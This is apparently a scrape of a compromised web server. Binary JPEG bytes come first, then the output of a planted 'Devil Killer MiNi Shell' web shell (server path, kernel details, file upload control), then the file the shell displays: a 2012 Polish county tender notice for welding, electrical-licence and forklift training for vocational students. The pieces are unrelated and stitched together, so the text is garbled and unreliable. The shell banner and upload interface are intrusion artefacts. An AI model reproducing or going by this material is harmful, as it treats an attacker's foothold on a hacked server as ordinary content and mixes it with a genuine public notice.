JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120126/24390-N-2012.html

<p class="kh_header"><b>Bełchatów: Zadanie 1: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie spawania stali, blach i rur metodą MAG (135)
Zadanie 2: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie eksploatacji urządzeń, instalacji i sieci elektroenergetycznych do 1 kV E
Zadanie 3: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie kierowców operatorów wózków jezdniowych
w ramach projektu:

Nowoczesna szkoła zawodowa kluczem wejścia na lokalny rynek pracy II- 
kursy kwalifikacyjne dla uczniów ZSP 3 w Bełchatowie
współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 24390 - 2012; data zamieszczenia: 26.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bełchatowie , ul. Pabianicka 17/19, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358600, faks 044 6358617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-belchatowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie spawania stali, blach i rur metodą MAG (135)
Zadanie 2: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie eksploatacji urządzeń, instalacji i sieci elektroenergetycznych do 1 kV E
Zadanie 3: Przeprowadzenie szkolenia dla 36 os. uprawnionych w zakresie kierowców operatorów wózków jezdniowych
w ramach projektu:

Nowoczesna szkoła zawodowa kluczem wejścia na lokalny rynek pracy II- 
kursy kwalifikacyjne dla uczniów ZSP 3 w Bełchatowie
współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III.2.  ZADANIE 1.
Przedmiotem zamówienia jest przeprowadzenie szkolenia dla 36 pełnoletnich uczniów Zasadniczej Szkoły Zawodowej wchodzącej w skład ZSP nr 3 w Bełchatowie w zakresie spawania stali, blach i rur metodą MAG (135).
Kurs będzie realizowany w 3 edycjach:
Edycja I:
-Nabór 12 uczniów: I 2012
-Zajęcia: II-IV 2012
Edycja II:
-Nabór 12 uczniów: V 2012
-Zajęcia: VI-VIII 2012
Edycja III:
-Nabór 12 uczniów: IX 2012
-Zajęcia: X- do 15 XII 2012
Za przeprowadzenie naborów odpowiada Zamawiający.
Dla każdego z naborów:
- W ramach kursu realizowanych będzie 160 h zajęć praktyki i 40 h teorii prowadzonych zgodnie z programem Instytutu Spawalnictwa w Gliwicach. Program musi również odpowiadać aktualnym wymogom określonym w Rozporządzeniu Ministra Edukacji i Nauki w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i ponadto spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. Program szkolenia musi również wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej znajdujących się na stronie internetowej ministerstwa. 
Program szkolenia należy przygotować szczegółowo wg Załącznika nr 3 do formularza oferty. 

- Program zajęć obejmować winien następujące tematy:
1) BHP,
2) zastosowanie elektryczności do spawania łukowego,
3) urządzenia spawalnicze,
4) materiały dodatkowe do spawania,
5) oznaczenia i wymiarowanie spoin,
6) spawanie w praktyce,
7) przygotowywanie złączy,
8) kwalifikacje spawaczy, 
9) budowa i użytkowanie urządzeń do spawania MAG, 
10) charakterystyka spawania MAG,
11) wykorzystanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych w bazie danych prowadzonych przez Ministra.

Celem zajęć ma być teoretyczne i praktyczne przygotowanie uczestników do egz. końcowych IS P T-FW-1-135 wg wytycznych Instytutu Nr W-07 IS-17. Na zakończenie Wykonawca zorganizuje i będzie nadzorował egzamin zgodnie z procedurami Instytutu. Członkami Komisji muszą być osoby posiadające certyfikat Instytutu. Po zdaniu egzaminu Wykonawca wręczy każdemu uczniowi książeczkę spawacza oraz certyfikat zgodnie z wymaganiami PN-EN 287-1 ISO 9606 i wytycznymi JS W-07 I-17.

-W skład kosztu dotyczącego zlecenia usługi przeprowadzenia szkolenia z zakresu spawania wchodzić winny następujące elementy:
1) koszty opłacenia badań lekarskich,
2) koszty wynagrodzenia wykładowców posiadających niezbędne kwalifikacje i uprawnienia zgodne z programem szkolenia,
3) koszty egzaminów,
4) koszty wydania uprawnień i certyfikatów,
5) koszty ubrań roboczych dla BO,
6) koszty środków czystości dla BO,
7) koszty napojów typu woda mineralna dla BO,
8) koszty materiałów i narzędzi niezbędnych do realizacji zajęć,
9) koszty materiałów dydaktycznych: tablic, pism, filmów dydaktycznych, skryptów, testów zerowych itp.
10) koszt udostępnienia sal do wykładów i zajęć praktycznych,
11) koszt ubezpieczenia uczestników szkolenia,
12) koszty opiekuna grup.


III.3.  ZADANIE 2.
Przedmiotem zamówienia jest przeprowadzenie szkolenia dla 36 pełnoletnich uczniów Zasadniczej Szkoły Zawodowej wchodzącej w skład ZSP nr 3 w Bełchatowie w zakresie eksploatacji urządzeń, instalacji i sieci elektroenergetycznych do 1 kV E.

Kurs będzie realizowany w 3 edycjach:
Edycja I:
-Nabór 12 uczniów: I 2012
-Zajęcia: II-III 2012
Edycja II:
-Nabór 12 uczniów: V 2012
-Zajęcia: VI-VII 2012
Edycja III:
-Nabór 12 uczniów: IX 2012
-Zajęcia: X-XI 2012
Za przeprowadzenie naborów odpowiada Zamawiający.

Dla każdego z naborów:
-W ramach kursu zrealizowanych musi zostać 12 h zajęć praktycznych i 48 h teorii prowadzonych zgodnie z programem Stowarzyszenia Elektryków Polskich (SEP) i Wytycznymi Nr W-07 IS-17. Celem zajęć jest przygotowanie uczniów do egzaminów na uzyskanie świadectwa kwalifikacji w zakresie eksploatacji wybranych urządzeń, instalacji lub sieci elektroenergetycznych o napięciu do 1 kV. Na zakończenie Wykonawca zorganizuje i będzie nadzorował egzamin przeprowadzony zgodnie z procedurami Stowarzyszenia przed Komisją SEP w Piotrkowie Tryb. Po zdaniu egzaminu uczeń otrzyma uprawnienia zawodowe SEP do obsługi urządzeń elektrycznych do 1 kV.

-Program zajęć musi odpowiadać aktualnym wymogom określonym w Rozporządzeniu Ministra Edukacji i Nauki w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i ponadto spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. Program musi również wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej znajdujących się na stronie internetowej ministerstwa. 
Program należy przygotować szczegółowo wg Załącznika nr 3 do formularza oferty i obejmować musi on następujące zagadnienia:
1) definicje, określenia i parametry znamionowe urządzeń elektrycznych,
2) budowa, działanie i warunki techniczne obsługi urządzeń, instalacji i sieci elektroenergetycznych,
3) zasady eksploatacji oraz instrukcje eksploatacji urządzeń, instalacji i sieci elektroenergetycznych,
4) ogólne zasady racjonalnej gospodarki energetycznej,
5) prace kontrolno -pomiarowe i montażowe,
6) BHP oraz umiejętność udzielania pierwszej pomocy,
7) instrukcje postępowania w razie awarii, pożarów i innych zagrożeń,
8) warunki techniczne dotyczące metodyki wykonywania badań ochrony przeciwpożarowej, 9) ćwiczenia praktyczne.

-W skład kosztu dotyczącego zlecenia usługi przeprowadzenia szkolenia z zakresu uprawnień SEP wchodzić będą następujące elementy:
1) koszty wynagrodzenia wykładowców posiadających niezbędne kwalifikacje i uprawnienia zgodne z programem szkolenia,
2) koszty egzaminów,
3) koszty wydania uprawnień i certyfikatów,
4) koszty materiałów i narzędzi niezbędnych do realizacji zajęć,
5) koszty materiałów dydaktycznych: tablic, pism, filmów dyd. skryptów, testów zerowych itp.
6) koszt udostępnienia sal do wykładów i zajęć praktycznych,
7) koszt ubezpieczenia uczestników szkolenia,
8) koszty opiekuna grup.


III.4.  ZADANIE 3.
Przedmiotem zamówienia jest przeprowadzenie szkolenia dla 36 pełnoletnich uczniów Zasadniczej Szkoły Zawodowej wchodzącej w skład ZSP nr 3 w Bełchatowie w zakresie kierowców operatorów wózków jezdniowych.

Kurs będzie realizowany w 3 edycjach:
Edycja I:
-Nabór 12 uczniów: I  2012
-Zajęcia: II-III 2012
Edycja II:
-Nabór 12 uczniów: V 2012
-Zajęcia: VI-VII 2012
Edycja III:
-Nabór 12 uczniów: IX 2012
-Zajęcia: X-XI 2012
Za przeprowadzenie naborów odpowiada Zamawiający.
Dla każdego z naborów:
-W ramach kursu zrealizowanych musi zostać 14 h zajęć praktycznych i 46 h teorii prowadzonych zgodnie z Dz. U. Nr 70 z 10 V 02 na podstawie programu ODK. Celem zajęć ma być praktyczne i teoretyczne przygotowanie do samodzielnego operowania wózkami jezdniowymi o napędzie elektrycznym. Na zakończenie Wykonawca zorganizuje i będzie nadzorował egzamin przeprowadzony przed Komisją Dozoru Technicznego. Uczestnik po pozytywnym zdaniu egzaminu otrzymać ma zaświadczenie kierowcy operatora wózków jezdniowych wg wzoru MEN.

-Program zajęć musi odpowiadać aktualnym wymogom określonym w Rozporządzeniu Ministra Edukacji i Nauki w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i ponadto spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. Program musi również wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej znajdujących się na stronie internetowej ministerstwa. 
Program należy przygotować szczegółowo wg Załącznika nr 3 do formularza oferty i obejmować musi on następujące zagadnienia:
1) typy wózków jezdniowych,
2) budowa wózków,
3) czynności kierowcy przy obsłudze wózka przed podjęciem pracy, w trakcie i po,
4) ładowność wózków,
5) ładunkoznawstwo,
6) przepisy BHP,
7) aparatura kontrolno-pomiarowa,
8) praktyczna nauka jazdy i manewrowanie wózkami,
9) dozór techniczny.

-W skład kosztu dotyczącego zlecenia usługi przeprowadzenia szkolenia z zakresu kierowania wózkami jezdniowymi wchodzić będą następujące elementy:
1) koszty wynagrodzenia wykładowców,
2) koszty egzaminów,
3) koszty wydania uprawnień i certyfikatów,
4) koszty materiałów i narzędzi niezbędnych do realizacji zajęć,
5) koszty materiałów dydaktycznych: tablic, pism, filmów dyd. skryptów, testów zerowych itp.,
6) koszt udostępnienia sal do wykładów i zajęć praktycznych,
7) koszt ubezpieczenia uczestników szkolenia,
8) koszty opiekuna grup..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Ww. warunek zostanie uznany za spełniony jeżeli Wykonawca  przedłoży oświadczenie 
z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:      Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, iż wykonywał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonywał co najmniej 1 usługę tego typu co przedmiot zamówienia, o wartości każdej z nich odpowiadającej co najmniej wartości stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączył dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.
Ww. warunek zostanie uznany za spełniony jeżeli Wykonawca złoży oświadczenie 
z art. 44 P.z.p. (Załącznik nr 1 do formularza oferty) oraz wykaz usług wg wzoru stanowiącego Załącznik nr 2 do formularza oferty wraz z dokumentami potwierdzającymi, że usługi te zostały należycie wykonane (np. referencje).Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:      Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  przedłoży:
a)oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty),
b)informację o dysponowaniu lokalem do przeprowadzenia zajęć praktycznych i teoretycznych- z wykorzystaniem wzoru stanowiącego załącznik nr 5 do formularza oferty,
c)imienny wykaz kadry pedagogiczne-  z wykorzystaniem wzoru stanowiącego załącznik nr 6 do formularza oferty.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:      Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  przedłoży:
a)oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty),
b)informację o dysponowaniu lokalem do przeprowadzenia zajęć praktycznych i teoretycznych- z wykorzystaniem wzoru stanowiącego załącznik nr 5 do formularza oferty,
c)imienny wykaz kadry pedagogiczne-  z wykorzystaniem wzoru stanowiącego załącznik nr 6 do formularza oferty.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:      Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)sytuacji ekonomicznej i finansowej.
Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  przedłoży oświadczenie 
z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie:      Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>V.4.1. Formularz ofertowy -  z wykorzystaniem wzoru określonego w niniejszej SIWZ.
V.4.2. Program każdego ze szkoleń- z wykorzystaniem wzoru stanowiącego załącznik nr 1 do formularza oferty
V.4.3. Harmonogram szkoleń- z wykorzystaniem wzoru stanowiącego załącznik nr 2 do formularza oferty.
V.4.4. Wzór zaświadczeń lub innych dokumentów potwierdzających ukończenie danego szkolenia.
V.4.5. Informacja o dysponowaniu lokalem do przeprowadzenia zajęć praktycznych i teoretycznych- z wykorzystaniem wzoru stanowiącego załącznik nr 3 do formularza oferty.
V.4.6. Imienny wykaz kadry pedagogiczne-  z wykorzystaniem wzoru stanowiącego załącznik nr 4 do formularza oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
